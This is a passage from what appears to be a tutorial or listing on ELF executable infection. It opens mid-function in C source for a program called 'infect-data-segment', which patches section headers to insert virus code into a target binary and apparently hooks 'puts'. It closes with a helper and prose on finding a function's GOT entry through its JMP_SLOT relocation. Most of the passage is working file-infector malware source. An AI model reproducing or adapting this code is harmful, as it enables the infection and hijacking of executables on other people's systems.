(write(out, &newshdr, sizeof(Elf32_Shdr)) != sizeof(Elf32_Shdr)) goto cleanup; bin.shdr[i].sh_offset += addlen; bin.shdr[i].sh_addr += addlen; bin.shdr[i].sh_size = 0; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; for (++i; i < bin.ehdr.e_shstrndx; i++) { bin.shdr[i].sh_offset += addlen; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; } bin.shdr[i].sh_size += sizeof(DEBUG_STRING); bin.shdr[i].sh_offset += addlen; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; for (++i; i < bin.ehdr.e_shnum; i++) { bin.shdr[i].sh_offset += addlen3; if (write( out, &bin.shdr[i], sizeof(Elf32_Shdr) ) != sizeof(Elf32_Shdr)) goto cleanup; } for (i = bin.ehdr.e_shstrndx + 1; i < bin.ehdr.e_shnum; i++) { if (lseek(out, addlen3 + bin.shdr[i].sh_offset, SEEK_SET) < 0) goto cleanup; if (write( out, bin.section[i], bin.shdr[i].sh_size ) != bin.shdr[i].sh_size) goto cleanup; } if (rename(tempname, host) < 0) { perror("rename"); exit(1); } if (fchown(out, st_buf.st_uid, st_buf.st_gid) < 0) { perror("chown"); exit(1); } free(zero); return; cleanup: unlink(tempname); exit(1); } int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "usage: infect-data-segment filename\n"); exit(1); } infect_elf( argv[1], get_virus, init_virus, VIRUS_LENGTH, "puts" ); exit(0); }
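
As a read-only illustration of the lookup described under GOT ADDRESS, the
sketch below scans an in-memory relocation table for the R_386_JMP_SLOT entry
that refers to a given dynamic symbol index and returns its r_offset. It is a
variation on do_rel from the listing, not a replacement for it: the name
find_jmp_slot, the explicit relocation-type check, and the use of 0 as a "not
found" value are assumptions for this example. It relies only on the Elf32_Rel
type and the ELF32_R_SYM / ELF32_R_TYPE macros from <elf.h>.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/*
 * Hypothetical helper: return the r_offset (the address of the GOT entry)
 * of the R_386_JMP_SLOT relocation that references dynamic symbol index
 * 'sym', or 0 if the table has no such entry.
 */
Elf32_Addr find_jmp_slot(const Elf32_Rel *rel, size_t count, Elf32_Word sym)
{
	size_t i;

	assert(rel != NULL || count == 0);

	for (i = 0; i < count; i++) {
		if (ELF32_R_TYPE(rel[i].r_info) != R_386_JMP_SLOT)
			continue;	/* not a PLT relocation */

		if (ELF32_R_SYM(rel[i].r_info) == sym)
			return rel[i].r_offset;
	}

	return 0;
}
```

Checking the relocation type as well as the symbol index means an entry of
another type that happens to reference the same symbol is skipped; whether
that matters depends on which relocation section the table was read from.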